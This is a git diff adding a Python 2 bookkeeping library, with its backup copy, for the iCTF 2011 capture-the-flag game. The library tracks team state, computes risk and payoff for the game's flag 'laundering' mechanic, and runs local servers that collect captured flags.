team=None): + '''Compiles a list of tuples describing the risk associated in + laundering *amount* money through each team and service, except + our self. + + Returned list of tuples has the following format: + [(team_id, service_id, risk),...] + + If service and team are given, only one risk will be returned.''' + + current_risks = [] + + if team and service: + N = 0 + if team in self.my_state['N']: + # The next line may needs to be exchanged by the following + # t['N'][self.my_id] + N = self.my_state['N'][team] + + Q = 0 + if service in self.my_state['Q']: + Q = self.my_state['Q'][service] + + return self.risk_function(self.services[service]['R'], amount, N, Q) + + for t_id,t in self.teams.items(): + # Ignore myself + if t_id == self.my_id: + continue + + N = 0 + if t_id in self.my_state['N']: + # The next line may needs to be exchanged by the following + # t['N'][self.my_id] + N = self.my_state['N'][t_id] + + for s_id,s in self.services.items(): + Q = 0 + if s_id in self.my_state['Q']: + Q = self.my_state['Q'][s_id] + + current_risks.append( + (t_id, s_id, self.risk_function(s['R'], amount, N, Q))) + + return current_risks + + def get_payoffs(self, amount, service=None): + '''Gives a quantitative prediction on how good a service would payoff + using it to launder *amount* money. + + If *defense* is not set, the quotient will be assumed 1.0 (meaning no + defense penalty) + + Returned list of tuples has the following format: + [(service_id, payoff_prediction),...] + + If service is given, only that payoff will be returned''' + + if service: + s = self.services[service] + after_cut = amount*(1.0-s['C']) # cut is given as percentage + return after_cut*s['P']*self.my_state['D'] + + payoffs = [] + + for s_id,s in self.services.items(): + # Payoff fuction: (amount laundered - cut) * defense% * payoff% + after_cut = amount*(1.0-s['C']) # cut is given as percentage + payoffs.append((s_id, after_cut*s['P']*self.my_state['D'])) + + return payoffs + + def parse_pushed_state(self, json_input): + ''' Updates self.teams and self.services + For format of members, see _init__() + and for json see: http://ictf.cs.ucsb.edu/your_pusher.txt + + Be careful to create new teams and services as they appear!''' + for json_line in json_input.split('\n'): + try: + state = json.loads(json_line) + assert type(state) == dict, 'Has to be a dict' + except Exception, err: + if json_input.strip(): + print 'Could not parse json input line:',json_line + print 'Error:',err + return + + self.tick = state['tick'] + + for s_id,s in state['services'].items(): + # Parse + s['C'] = s['C']/100.0 + s['P'] = s['P']/100.0 + s['R'] = s['R']/100.0 + + # Create service if necessary + if s_id not in self.services: + self.services[s_id] = s + else: + # Or just update + self.services[s_id].update(s) + + for t_id,t in state['teams'].items(): + # Parse + t['D'] = t['D']/100.0 + + # Subnet to ipaddr.IPv4Network object + t['subnet'] = ipaddr.IPv4Network(t['subnet']) + + # N, Q, money, points and challenges_solved are fine like + # they are, nothing to do + + # Rename services_compromised_last_tick -> svc_up + t['svc_up'] = t['services_compromised_last_tick'] + del t['services_compromised_last_tick'] + # and services_up_last_tick -> svc_comp + t['svc_comp'] = t['services_up_last_tick'] + del t['services_up_last_tick'] + + # Create team if necessary + if t_id not in self.teams: + self.teams[t_id] = t + else: + # Or just update + self.teams[t_id].update(t) + + if self.show_ticks: + print 'New tick:',self.tick + if self.tick_callback: + self.tick_callback() + + def get_flag(self, flag, remove=False): + r = filter(lambda x: x['flag']==flag, self.unused_flags) + + if r: + if remove: + self.unused_flags.remove(r[0]) + return r[0] + else: + return None + + def launder(self, amount, flag_data): + '''Tries to launder *amount* money with flag contained in *flag_data* + *flag_data* must have same format as in unused_flags, see __init__() + and should have been poped (removed) from unused_flags. + + Returns (result, points_gained, msg)''' + + assert amount<=self.teams[self.my_id]['money'], 'Insufficient funds.' + + result, points_gained, msg, from_team, from_service = \ + self._launder_request(amount, flag_data['flag']) + + # If from_team or from_service were returned on request, use them, + # they must be correct + if from_team: + flag_data['from_team'] = from_team + if from_service: + flag_data['from_service'] = from_service + + flag_data['time_used'] = datetime.now() + flag_data['action'] = 'laundering' + flag_data['money_given'] = amount + flag_data['points_gained'] = points_gained + flag_data['result'] = result + flag_data['msg'] = msg + + # Reduce our left-over money + if result in ["SUCCESS", "BAD_LUCK"]: + self.teams[self.my_id]['money'] -= amount + # Own points are not used for anything, thus need no update + + self.transactions.append(flag_data) + + return (result, points_gained, msg) + + def betray(self, flag_data): + '''Tries to betray others with flag contained in *flag_data* + *flag_data* must have same format as in unused_flags, see __init__() + and should have been poped (removed) from unused_flags. + + Returns (result, msg)''' + + result, msg, from_team, from_service = \ + self._betrayal_request(flag_data['flag']) + + # If from_team or from_service were returned on request, use them, + # they must be correct + if from_team: + flag_data['from_team'] = from_team + if from_service: + flag_data['from_service'] = from_service + + flag_data['time_used'] = datetime.now() + flag_data['action'] = 'betrayal' + flag_data['money_given'] = 0.0 + flag_data['points_gained'] = 0.0 + flag_data['result'] = result + flag_data['msg'] = msg + + self.transactions.append(flag_data) + + return (result, msg) + + def add_new_flag(self, flag, team, service): + if flag in self.all_flags: + return False + self.all_flags.append(flag) + + flag_data = { + 'flag': flag, + 'time_received': datetime.now(), + 'from_team': team, + 'from_service': service, + } + + self.unused_flags.append(flag_data) + return True + + @property + def my_state(self): + return self.teams[self.my_id] + + def start_state_receiver(self, host="localhost", port=recv_port): + assert not self.recv_state_socket, 'Server has already been started!' + + class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler): + def handle(self_server): + try: + f = self_server.request.makefile("rb") + while True: + self.parse_pushed_state(f.readline()) + except: + return + + class ThreadedTCPServer(SocketServer.ThreadingMixIn, \ + SocketServer.TCPServer): + pass + + self.recv_state_socket = ThreadedTCPServer((host, port), \ + ThreadedTCPRequestHandler) + ip, port = self.recv_state_socket.server_address + + # Start a thread with the server -- that thread will then start one + # more thread for each request + self.recv_state_thread = threading.Thread( \ + target=self.recv_state_socket.serve_forever) + # Exit the server thread when the main thread terminates + self.recv_state_thread.daemon = True + self.recv_state_thread.start() + + return ip, port + + def stop_state_receiver(self): + if self.recv_state_socket: + self.recv_state_socket.shutdown() + + def find_team(self, needle): + if needle in self.teams.keys(): + return needle + + try: + ip = ipaddr.IPv4Address(needle) + teams = filter(lambda x: ip in x[1]['subnet'], self.teams.items()) + if teams: + return teams[0][0] + except: + pass + + team_ids = map(lambda x: (x[0], x[1]['subnet'].ip.exploded.split('.')[2]), \ + self.teams.items()) + teams = filter(lambda x: needle in x[1], team_ids) + if teams: + return teams[0][0] + + return None + + def start_flag_receiver(self, host="localhost", port=0): + assert not self.recv_flag_server, 'Server has already been started!' + self.recv_flag_server = {} + + class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler): + def handle(self_server): + try: + f = self_server.request.makefile("rb") + + f.write("Which team? Number, IP or name\n") + team = self.find_team(f.readline().strip()) + if team == None: + f.write('Unknown team!\n') + return + + f.write("Which service? Choices: "+ \ + str(self.services.keys())+"\n") + service = f.readline().strip() + if service not in self.services.keys(): + f.write('Unknown service!\n') + return + + while True: + recv = f.readline() + if not recv: break + + counter_new, counter_old = 0, 0 + for m in re.finditer(self.flag_re, recv): + if self.add_new_flag(m.group(0), team, service): + counter_new += 1 + else: + counter_old += 1 + + if counter_new or counter_old: + self_server.request.send(str(counter_new)+ \ + ' new and '+str(counter_old)+' old flags.\n') + else: + self_server.request.send('No flags :(\n') + except Exception, e: + # Client may have disconnected + return + + class ThreadedTCPServer(SocketServer.ThreadingMixIn, \ + SocketServer.TCPServer): + pass + + self.recv_flag_server['socket'] = ThreadedTCPServer((host, port), \ + ThreadedTCPRequestHandler) + ip, port = self.recv_flag_server['socket'].server_address + self.recv_flag_server['ip'] = ip + self.recv_flag_server['port'] = port + + # Start a thread with the server -- that thread will then start one + # more thread for each request + self.recv_flag_server['thread'] = threading.Thread( \ + target=self.recv_flag_server['socket'].serve_forever) + # Exit the server thread when the main thread terminates + self.recv_flag_server['thread'].daemon = True + self.recv_flag_server['thread'].start() + + return ip, port + + def stop_flag_receiver(self): + if self.recv_flag_server: + self.recv_flag_server['socket'].shutdown() + del self.recv_flag_server + + def print_scorboard(self, sort_by='points', reverse=True): + print + print "Scorboard as of tick",str(self.tick)+':' + + teams = sorted(self.teams.items(), key=lambda x: x[1][sort_by], \ + reverse=reverse) + cprint('% 20s % 8s % 8s % 7s' % \ + ('Team', 'Points', 'Money', 'Chal.'), attrs=['bold']) + for t_id,t in teams: + if t_id == self.my_id: + cprint('% 20s % 8i % 8i % 7i' % \ + (t_id, t['points'], t['money'], len(t['challenges_solved'])), \ + 'blue', 'on_red') + else: + print '% 20s % 8i % 8i % 7i' % \ + (t_id, t['points'], t['money'], len(t['challenges_solved'])) + + def print_risks(self, amount, reverse=False): + print + print "Risks for converion of",amount,"as of tick",str(self.tick)+':' + + risks = sorted(self.get_risks(amount), key=lambda x: x[2], \ + reverse=reverse) + cprint('% 20s % 10s % 6s' % \ + ('Team', 'Service', 'Risk'), attrs=['bold']) + for t_id,s_id,risk in risks: + have_flags = False + for f in self.unused_flags: + if f['from_team'] == t_id and f['from_service'] == s_id: + have_flags = True + break + + if have_flags: + cprint('% 20s % 10s % 6.2f' % \ + (t_id, s_id, risk), 'blue', 'on_red') + else: + print '% 20s % 10s % 6.2f' % (t_id, s_id, risk) + + def print_payoffs(self, amount, reverse=True): + print + print "Payoffs for conversion of",amount,"as of tick",str(self.tick)+':' + + payoffs = sorted(self.get_payoffs(amount), key=lambda x: x[1], \ + reverse=reverse) + cprint('% 10s % 8s' % \ + ('Service', 'Payoff'), attrs=['bold']) + for s_id,payoff in payoffs: + have_flags = False + for f in self.unused_flags: + if f['from_service'] == s_id: + have_flags = True + break + + if have_flags: + cprint('% 10s % 8.0f' % \ + (s_id, payoff), 'blue', 'on_red') + else: + print '% 10s % 8.0f' % (s_id, payoff) + + def print_expectancy(self, amount, cutoff=None): + flags = [] + + for f in self.unused_flags: + r = self.get_risks(amount, service=f['from_service'], \ + team=f['from_team']) + p = self.get_payoffs(amount, service=f['from_service']) + + if not cutoff or amount/r*p > cutoff: + flags.append((f['flag'], r*p)) + + flags = sorted(flags, key=lambda x: x[1], reverse=True) + + print + print 'Payoff expectancy for',amount,'as of tick',str(self.tick)+':' + cprint('% 12s % 40s' % \ + ('Exp.Points', 'Flag'), attrs=['bold']) + for flag,payoff in flags: + print '% 12.0f % 40s' % (payoff,flag) + + def print_transactions(self, num=20): + # 'time_used': datetime.now(), # Time of usage + # 'flag': 'fooBAR', # String associated with flag + # 'time_stolen': ..., # As found in unused_flags + # 'from_team': 'TEAM1_ID', # As found in unused_flags + # 'from_service': 'SVC1_ID', # As found in new_flag + # 'action': 'laundering', # "betrayal" or "laundering" + # 'money_given': 12.3, # if "laundering", otherwise 0.0 + # 'points_gained': 12.3, # if "laundering" and successfull, + # # otherwise 0.0 + # 'result': "SUCCESS", # "SUCCESS", "BAD_FLAG", "BAD_LUCK", + # # "OLD_FLAG" or "OTHER" + # 'msg': 'Flag sub. suc.' + print + print 'Latest transactions:' + print '% 7s % 20s % 10s % 10s % 8s % 20s' % \ + ('Time', 'Team', 'Service', 'Result', 'Points', 'Return Message') + for t in self.transactions[num*-1:]: + time = t['time_used'].time() + print '% 7s % 20s % 10s % 10s % 8i % 20s' % \ + (str(time.hour)+':'+str(time.minute), \ + t['from_team'], t['from_service'], t['result'], \ + t['points_gained'], t['msg']) + + + def __getstate__(self): + '''Needed for pickleability... (sockets can not be pickled)''' + new_dict = self.__dict__ + new_dict['recv_flag_server'] = None + new_dict['recv_state_thread'] = None + new_dict['recv_state_socket'] = None + new_dict['tick_callback'] = None + new_dict['flag_dissipater_instance'] = None + + return new_dict + + def backup(self, filename='ictf2011.backup'): + pickle.dump(self, open(filename, 'w')) + + @staticmethod + def load(filename='ictf2011.backup'): + return pickle.load(open(filename)) + + def stop_flag_dissipater(self): + if self.flag_dissipater_instance: + self.flag_dissipater_instance.stop = True + + def start_flag_dissipater(self): + if not self.flag_dissipater_instance: + return + + class flag_dissipater(threading.Thread): + stop = False + cutoff = 0.75 + + def run(self): + '''Runs until stop is set to True + Will "sell" all flags with expectancy over cutoff and use + all others to compromise other people services + TODO''' + while not stop: + time.sleep(30) + # TODO + print 'foo' + + self.flag_dissipater_instance = flag_dissipater() + self.flag_dissipater_instance.start() + +def client(ip, port, messages): + '''Just for debugging and testing purposes''' + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((ip, port)) + try: + for message in messages: + sock.send(message) + finally: + sock.close() + +if __name__ == '__main__': + ctf = ictf() + ip, port = ctf.start_state_receiver() + + # Run test data through here! + client(ip, port, '{"services": {"S1": {"P": 58, "C": 3, "R": 10}, "foobar": {"P": 98, "C": 42, "R": 90}, "hogwarts": {"P": 60, "C": 10, "R": 5}}, "tick": 666, "teams": {"A-team": {"subnet": "127.0.0.0/24", "D": 70, "services_compromised_last_tick": ["foobar", "S1"], "money": 395, "N": { "Justice League" : 600 }, "Q": {"S1": 10, "foobar": 10000}, "points": 394, "services_up_last_tick": ["S1", "foobar", "hogwarts"], "challenges_solved": [10, 971, 424242]}, "Justice League": {"subnet": "10.230.230.0/24", "D": 30, "services_compromised_last_tick": ["hogwarts"], "money": 3859, "N": { "foobar" : 6093 }, "Q": {"hogwarts": 1093, "foobar": 10000}, "points": 10293, "services_up_last_tick": ["hogwarts"], "challenges_solved": [30, 5391, 305]}}}'+ \ + "\nIf you can read this on your console, that is good :) (test passed)") + + time.sleep(1) + t = ctf.teams['Justice League'] + assert t['svc_comp'] == ['hogwarts'], 'Justice League.svc_comp not received' + assert t['svc_up'] == ['hogwarts'], 'Justice League.svc_up not received' + assert t['points'] == 10293, 'Justice League.points not received' + assert t['money'] == 3859, 'Justice League.money not received' + assert t['N']['foobar'] == 6093, 'Justice League.N not received' + + s = ctf.services['foobar'] + assert s['C'] == 42/100.0, 'foobar.C not received' + assert s['P'] == 98/100.0, 'foobar.P not received' + assert s['R'] == 90/100.0, 'foobar.R not received' + + ctf.start_flag_receiver() + time.sleep(1) + ip, port = ctf.recv_flag_server['ip'], \ + ctf.recv_flag_server['port'] + client(ip, port, ["Justice League\n","foobar\n","ABCDEFGHIJKLMNOPQRSTUVWXYZ!\n"]) + client(ip, port, ["230\n","S1\n","ABCDEFGHIJKLFOOPQRSTUVWXYZ!\n"]) + client(ip, port, ["10.230.230.3\n","hogwarts\n","FOOBARGHIJKLMNOPQRSTUVWXYZ!\n", \ + "!!BARFOOBAZ!!\n","BLUBBER!\n","BAR\n"]) + time.sleep(1) + assert 'FOO' in ctf.all_flags, 'Flag FOO not recognized' + assert 'BAR' in ctf.all_flags, 'Flag BAR not recognized' + assert 'BAZ' in ctf.all_flags, 'Flag BAZ not recognized' + assert len(ctf.unused_flags) == 3, 'Flags did not make it in unused_flags' + + ctf.stop_flag_receiver() + ctf.stop_state_receiver() + + ctf.backup() + new_ctf = ictf.load() + + assert new_ctf.get_risks(100) == ctf.get_risks(100), 'Dump and reload faulty' + assert new_ctf.get_payoffs(100) == ctf.get_payoffs(100), 'Dump and reload faulty' + del new_ctf + + ctf.print_scorboard() + ctf.print_risks(1000) + ctf.print_payoffs(1000) + ctf.print_expectancy(1000) + + print ctf.launder(100, ctf.get_flag('FOO',remove=True)) + assert None == ctf.get_flag('FOO'), 'get_flag(f, remove=True) failed' + assert 'FOO' == ctf.transactions[-1]['flag'], 'Transaction failed' + print ctf.betray(ctf.get_flag('BAR',remove=True)) + assert 'BAR' == ctf.transactions[-1]['flag'], 'Transaction failed' + + ctf.print_transactions() + + print 'ok' diff --git a/riskasses/riskasses.py~ b/riskasses/riskasses.py~ @@ -0,0 +1,691 @@ +#!/usr/bin/env python +import socket +import threading +import SocketServer +from datetime import datetime +import re +import pickle +import time +import json +from termcolor import colored, cprint +from pprint import pprint as pp +import ipaddr +import threading + +class ictf: + # Risk assesment and money laundering library based on + # http://ictf.cs.ucsb.edu/iCTF_2011_Description.txt + # + # Missing Information, that will be provided at beginning of iCTF2011: + + # - Regular expression for flags + #flag_re = r'[A-Fa-f0-9]{40}' + flag_re = r'FOO|BAR|BAZ' + + # - ID of this team + my_id = "A-team" + + # - Overall risk function + def risk_function(self, R, M, N, Q): + ''' Calculates the risk, using the following input: + R: Risk associated with service (float, probability, <= 1) + M: Amount of money to launder + N: Amount of money that has been laundered through that team by us + Q: Amount of money that has been laundered through that svc by us + + Must return a probability (float smaller/equal 1.0)''' + + # TODO + return 0.5 + + # - Submit launder requests + def _launder_request(self, amount, flag): + '''Must return a tuple with the following format: + (result, points_gained, msg, exploited_team, exploited_svc) with + state: "SUCCESS", "BAD_FLAG", "OLD_FLAG", "BAD_LUCK" or + "OTHER" + points_gained: amount of points gained + msg: whatever flugsubmission returned + exploited_team, exploited_svc: if msg contains that information, + include team/svc id, otherwise None''' + + # TODO + return ("OTHER", 0.0, 'not yet implemented', None, None) + + # - Submit betrayal requests + def _betrayal_request(self, flag): + '''Must return a tuple with the following format: + (result, msg, from_team, from_service) with state being: + "SUCCESS", "OLD_FLAG", "BAD_FLAG" or "OTHER" + and msg whatever flugsubmission returned + from_team, from_service if msg contains that information, + include team/svc id, otherwise None''' + + # TODO + return ("OTHER",'not yet implemented', None, None) + + # THAT'S IT! NOTHING TO DONE BELOW + + # - State Pusher receive port + recv_port = 55555 + + def __init__(self, my_id=my_id): + self.teams = {} + # Format: + # { "TEAM1_ID": {'money': 123, + # 'points': 123, + # 'svc_up': ["SVC1_ID",...], + # 'svc_comp': ["SVC99_ID",...], + # 'N': {"TEAM2_ID": 4, ...}, + # 'Q': {"SVC1_ID": 6, ...} + # 'D': 0.33, + # 'subnet': '1.2.3.0/24', + # 'challenges_solved': [30, 5391, 305]} + + self.services = {} + # Format: + # { "SVC1_ID": {'C': 0.33, # cut in Percentage/100 + # 'P': 0.67, # profit in Percentage/100 + # 'R': 0.1} # risk in Probability + + self.transactions = [] + # Format: + # [{ 'time_used': datetime.now(), # Time of usage + # 'flag': 'fooBAR', # String associated with flag + # 'time_stolen': ..., # As found in unused_flags + # 'from_team': 'TEAM1_ID', # As found in unused_flags + # 'from_service': 'SVC1_ID', # As found in new_flag + # 'action': 'laundering', # "betrayal" or "laundering" + # 'money_given': 12.3, # if "laundering", otherwise 0.0 + # 'points_gained': 12.3, # if "laundering" and successfull, + # # otherwise 0.0 + # 'result': "SUCCESS", # "SUCCESS", "BAD_FLAG", "BAD_LUCK", + # # "OLD_FLAG" or "OTHER" + # 'msg': 'Flag sub. suc.', # Whatever flagsubmission returned + # },...] + + self.unused_flags = [] + # Format: + # [{ 'flag': 'fooBAR', # String associated with flag + # 'time_received': ..., # Time of reception + # 'from_team': 'TEAM1_ID', # Where did it come from? + # # if unknown, None + # 'from_service': 'SVC1_ID', # Where did it come from? + # # if unknown, None + # },...] + + self.all_flags = [] + # List of all flags ever put in unused_flags or transactions + + self.my_id = my_id + self.recv_state_socket = None + self.recv_state_thread = None + self.recv_flag_server = None + + self.flag_dissipater_instance = None + + # Do you want every tick to produce a message? + self.show_ticks = True + self.tick_callback = self.print_scorboard + + def get_risks(self, amount, service=None, team=None): + '''Compiles a list of tuples describing the risk associated in + laundering *amount* money through each team and service, except + our self. + + Returned list of tuples has the following format: + [(team_id, service_id, risk),...] + + If service and team are given, only one risk will be returned.''' + + current_risks = [] + + if team and service: + N = 0 + if team in self.my_state['N']: + # The next line may needs to be exchanged by the following + # t['N'][self.my_id] + N = self.my_state['N'][team] + + Q = 0 + if service in self.my_state['Q']: + Q = self.my_state['Q'][service] + + return self.risk_function(self.services[service]['R'], amount, N, Q) + + for t_id,t in self.teams.items(): + # Ignore myself + if t_id == self.my_id: + continue + + N = 0 + if t_id in self.my_state['N']: + # The next line may needs to be exchanged by the following + # t['N'][self.my_id] + N = self.my_state['N'][t_id] + + for s_id,s in self.services.items(): + Q = 0 + if s_id in self.my_state['Q']: + Q = self.my_state['Q'][s_id] + + current_risks.append( + (t_id, s_id, self.risk_function(s['R'], amount, N, Q))) + + return current_risks + + def get_payoffs(self, amount, service=None): + '''Gives a quantitative prediction on how good a service would payoff + using it to launder *amount* money. + + If *defense* is not set, the quotient will be assumed 1.0 (meaning no + defense penalty) + + Returned list of tuples has the following format: + [(service_id, payoff_prediction),...] + + If service is given, only that payoff will be returned''' + + if service: + s = self.services[service] + after_cut = amount*(1.0-s['C']) # cut is given as percentage + return after_cut*s['P']*self.my_state['D'] + + payoffs = [] + + for s_id,s in self.services.items(): + # Payoff fuction: (amount laundered - cut) * defense% * payoff% + after_cut = amount*(1.0-s['C']) # cut is given as percentage + payoffs.append((s_id, after_cut*s['P']*self.my_state['D'])) + + return payoffs + + def parse_pushed_state(self, json_input): + ''' Updates self.teams and self.services + For format of members, see _init__() + and for json see: http://ictf.cs.ucsb.edu/your_pusher.txt + + Be careful to create new teams and services as they appear!''' + for json_line in json_input.split('\n'): + try: + state = json.loads(json_line) + assert type(state) == dict, 'Has to be a dict' + except Exception, err: + if json_input.strip(): + print 'Could not parse json input line:',json_line + print 'Error:',err + return + + self.tick = state['tick'] + + for s_id,s in state['services'].items(): + # Parse + s['C'] = s['C']/100.0 + s['P'] = s['P']/100.0 + s['R'] = s['R']/100.0 + + # Create service if necessary + if s_id not in self.services: + self.services[s_id] = s + else: + # Or just update + self.services[s_id].update(s) + + for t_id,t in state['teams'].items(): + # Parse + t['D'] = t['D']/100.0 + + # Subnet to ipaddr.IPv4Network object + t['subnet'] = ipaddr.IPv4Network(t['subnet']) + + # N, Q, money, points and challenges_solved are fine like + # they are, nothing to do + + # Rename services_compromised_last_tick -> svc_up + t['svc_up'] = t['services_compromised_last_tick'] + del t['services_compromised_last_tick'] + # and services_up_last_tick -> svc_comp + t['svc_comp'] = t['services_up_last_tick'] + del t['services_up_last_tick'] + + # Create team if necessary + if t_id not in self.teams: + self.teams[t_id] = t + else: + # Or just update + self.teams[t_id].update(t) + + if self.show_ticks: + print 'New tick:',self.tick + if self.tick_callback: + self.tick_callback() + + def get_flag(self, flag, remove=False): + r = filter(lambda x: x['flag']==flag, self.unused_flags) + + if r: + if remove: + self.unused_flags.remove(r[0]) + return r[0] + else: + return None + + def launder(self, amount, flag_data): + '''Tries to launder *amount* money with flag contained in *flag_data* + *flag_data* must have same format as in unused_flags, see __init__() + and should have been poped (removed) from unused_flags. + + Returns (result, points_gained, msg)''' + + assert amount<=self.teams[self.my_id]['money'], 'Insufficient funds.' + + result, points_gained, msg, from_team, from_service = \ + self._launder_request(amount, flag_data['flag']) + + # If from_team or from_service were returned on request, use them, + # they must be correct + if from_team: + flag_data['from_team'] = from_team + if from_service: + flag_data['from_service'] = from_service + + flag_data['time_used'] = datetime.now() + flag_data['action'] = 'laundering' + flag_data['money_given'] = amount + flag_data['points_gained'] = points_gained + flag_data['result'] = result + flag_data['msg'] = msg + + # Reduce our left-over money + if result in ["SUCCESS", "BAD_LUCK"]: + self.teams[self.my_id]['money'] -= amount + # Own points are not used for anything, thus need no update + + self.transactions.append(flag_data) + + return (result, points_gained, msg) + + def betray(self, flag_data): + '''Tries to betray others with flag contained in *flag_data* + *flag_data* must have same format as in unused_flags, see __init__() + and should have been poped (removed) from unused_flags. + + Returns (result, msg)''' + + result, msg, from_team, from_service = \ + self._betrayal_request(flag_data['flag']) + + # If from_team or from_service were returned on request, use them, + # they must be correct + if from_team: + flag_data['from_team'] = from_team + if from_service: + flag_data['from_service'] = from_service + + flag_data['time_used'] = datetime.now() + flag_data['action'] = 'betrayal' + flag_data['money_given'] = 0.0 + flag_data['points_gained'] = 0.0 + flag_data['result'] = result + flag_data['msg'] = msg + + self.transactions.append(flag_data) + + return (result, msg) + + def add_new_flag(self, flag, team, service): + if flag in self.all_flags: + return False + self.all_flags.append(flag) + + flag_data = { + 'flag': flag, + 'time_received': datetime.now(), + 'from_team': team, + 'from_service': service, + } + + self.unused_flags.append(flag_data) + return True + + @property + def my_state(self): + return self.teams[self.my_id] + + def start_state_receiver(self, host="localhost", port=recv_port): + assert not self.recv_state_socket, 'Server has already been started!' + + class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler): + def handle(self_server): + try: + f = self_server.request.makefile("rb") + while True: + self.parse_pushed_state(f.readline()) + except: + return + + class ThreadedTCPServer(SocketServer.ThreadingMixIn, \ + SocketServer.TCPServer): + pass + + self.recv_state_socket = ThreadedTCPServer((host, port), \ + ThreadedTCPRequestHandler) + ip, port = self.recv_state_socket.server_address + + # Start a thread with the server -- that thread will then start one + # more thread for each request + self.recv_state_thread = threading.Thread( \ + target=self.recv_state_socket.serve_forever) + # Exit the server thread when the main thread terminates + self.recv_state_thread.daemon = True + self.recv_state_thread.start() + + return ip, port + + def stop_state_receiver(self): + if self.recv_state_socket: + self.recv_state_socket.shutdown() + + def find_team(self, needle): + if needle in self.teams.keys(): + return needle + + try: + ip = ipaddr.IPv4Address(needle) + teams = filter(lambda x: ip in x[1]['subnet'], self.teams.items()) + if teams: + return teams[0][0] + except: + pass + + team_ids = map(lambda x: (x[0], x[1]['subnet'].ip.exploded.split('.')[2]), \ + self.teams.items()) + teams = filter(lambda x: needle in x[1], team_ids) + if teams: + return teams[0][0] + + return None + + def start_flag_receiver(self, host="localhost", port=0): + assert not self.recv_flag_server, 'Server has already been started!' + self.recv_flag_server = {} + + class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler): + def handle(self_server): + try: + f = self_server.request.makefile("rb") + + f.write("Which team? Number, IP or name\n") + team = self.find_team(f.readline().strip()) + if team == None: + f.write('Unknown team!\n') + return + + f.write("Which service? Choices: "+ \ + str(self.services.keys())+"\n") + service = f.readline().strip() + if service not in self.services.keys(): + f.write('Unknown service!\n') + return + + while True: + recv = f.readline() + if not recv: break + + counter_new, counter_old = 0, 0 + for m in re.finditer(self.flag_re, recv): + if self.add_new_flag(m.group(0), team, service): + counter_new += 1 + else: + counter_old += 1 + + if counter_new or counter_old: + self_server.request.send(str(counter_new)+ \ + ' new and '+str(counter_old)+' old flags.\n') + else: + self_server.request.send('No flags :(\n') + except Exception, e: + # Client may have disconnected + return + + class ThreadedTCPServer(SocketServer.ThreadingMixIn, \ + SocketServer.TCPServer): + pass + + self.recv_flag_server['socket'] = ThreadedTCPServer((host, port), \ + ThreadedTCPRequestHandler) + ip, port = self.recv_flag_server['socket'].server_address + self.recv_flag_server['ip'] = ip + self.recv_flag_server['port'] = port + + # Start a thread with the server -- that thread will then start one + # more thread for each request + self.recv_flag_server['thread'] = threading.Thread( \ + target=self.recv_flag_server['socket'].serve_forever) + # Exit the server thread when the main thread terminates + self.recv_flag_server['thread'].daemon = True + self.recv_flag_server['thread'].start() + + return ip, port + + def stop_flag_receiver(self): + if self.recv_flag_server: + self.recv_flag_server['socket'].shutdown() + del self.recv_flag_server + + def print_scorboard(self, sort_by='points', reverse=True): + print + print "Scorboard as of tick",str(self.tick)+':' + + teams = sorted(self.teams.items(), key=lambda x: x[1][sort_by], \ + reverse=reverse) + cprint('% 20s % 8s % 8s % 7s' % \ + ('Team', 'Points', 'Money', 'Chal.'), attrs=['bold']) + for t_id,t in teams: + if t_id == self.my_id: + cprint('% 20s % 8i % 8i % 7i' % \ + (t_id, t['points'], t['money'], len(t['challenges_solved'])), \ + 'blue', 'on_red') + else: + print '% 20s % 8i % 8i % 7i' % \ + (t_id, t['points'], t['money'], len(t['challenges_solved'])) + + def print_risks(self, amount, reverse=False): + print + print "Risks for converion of",amount,"as of tick",str(self.tick)+':' + + risks = sorted(self.get_risks(amount), key=lambda x: x[2], \ + reverse=reverse) + cprint('% 20s % 10s % 6s' % \ + ('Team', 'Service', 'Risk'), attrs=['bold']) + for t_id,s_id,risk in risks: + have_flags = False + for f in self.unused_flags: + if f['from_team'] == t_id and f['from_service'] == s_id: + have_flags = True + break + + if have_flags: + cprint('% 20s % 10s % 6.2f' % \ + (t_id, s_id, risk), 'blue', 'on_red') + else: + print '% 20s % 10s % 6.2f' % (t_id, s_id, risk) + + def print_payoffs(self, amount, reverse=True): + print + print "Payoffs for conversion of",amount,"as of tick",str(self.tick)+':' + + payoffs = sorted(self.get_payoffs(amount), key=lambda x: x[1], \ + reverse=reverse) + cprint('% 10s % 8s' % \ + ('Service', 'Payoff'), attrs=['bold']) + for s_id,payoff in payoffs: + have_flags = False + for f in self.unused_flags: + if f['from_service'] == s_id: + have_flags = True + break + + if have_flags: + cprint('% 10s % 8.0f' % \ + (s_id, payoff), 'blue', 'on_red') + else: + print '% 10s % 8.0f' % (s_id, payoff) + + def print_expectancy(self, amount, cutoff=None): + flags = [] + + for f in self.unused_flags: + r = self.get_risks(amount, service=f['from_service'], \ + team=f['from_team']) + p = self.get_payoffs(amount, service=f['from_service']) + + if not cutoff or amount/r*p > cutoff: + flags.append((f['flag'], r*p)) + + flags = sorted(flags, key=lambda x: x[1], reverse=True) + + print + print 'Payoff expectancy for',amount,'as of tick',str(self.tick)+':' + cprint('% 12s % 40s' % \ + ('Exp.Points', 'Flag'), attrs=['bold']) + for flag,payoff in flags: + print '% 12.0f % 40s' % (payoff,flag) + + def print_transactions(self, num=20): + # 'time_used': datetime.now(), # Time of usage + # 'flag': 'fooBAR', # String associated with flag + # 'time_stolen': ..., # As found in unused_flags + # 'from_team': 'TEAM1_ID', # As found in unused_flags + # 'from_service': 'SVC1_ID', # As found in new_flag + # 'action': 'laundering', # "betrayal" or "laundering" + # 'money_given': 12.3, # if "laundering", otherwise 0.0 + # 'points_gained': 12.3, # if "laundering" and successfull, + # # otherwise 0.0 + # 'result': "SUCCESS", # "SUCCESS", "BAD_FLAG", "BAD_LUCK", + # # "OLD_FLAG" or "OTHER" + # 'msg': 'Flag sub. suc.' + print + print 'Latest transactions:' + print '% 7s % 20s % 10s % 10s % 8s % 20s' % \ + ('Time', 'Team', 'Service', 'Result', 'Points', 'Return Message') + for t in self.transactions[num*-1:]: + time = t['time_used'].time() + print '% 7s % 20s % 10s % 10s % 8i % 20s' % \ + (str(time.hour)+':'+str(time.minute), \ + t['from_team'], t['from_service'], t['result'], \ + t['points_gained'], t['msg']) + + + def __getstate__(self): + '''Needed for pickleability... (sockets can not be pickled)''' + new_dict = self.__dict__ + new_dict['recv_flag_server'] = None + new_dict['recv_state_thread'] = None + new_dict['recv_state_socket'] = 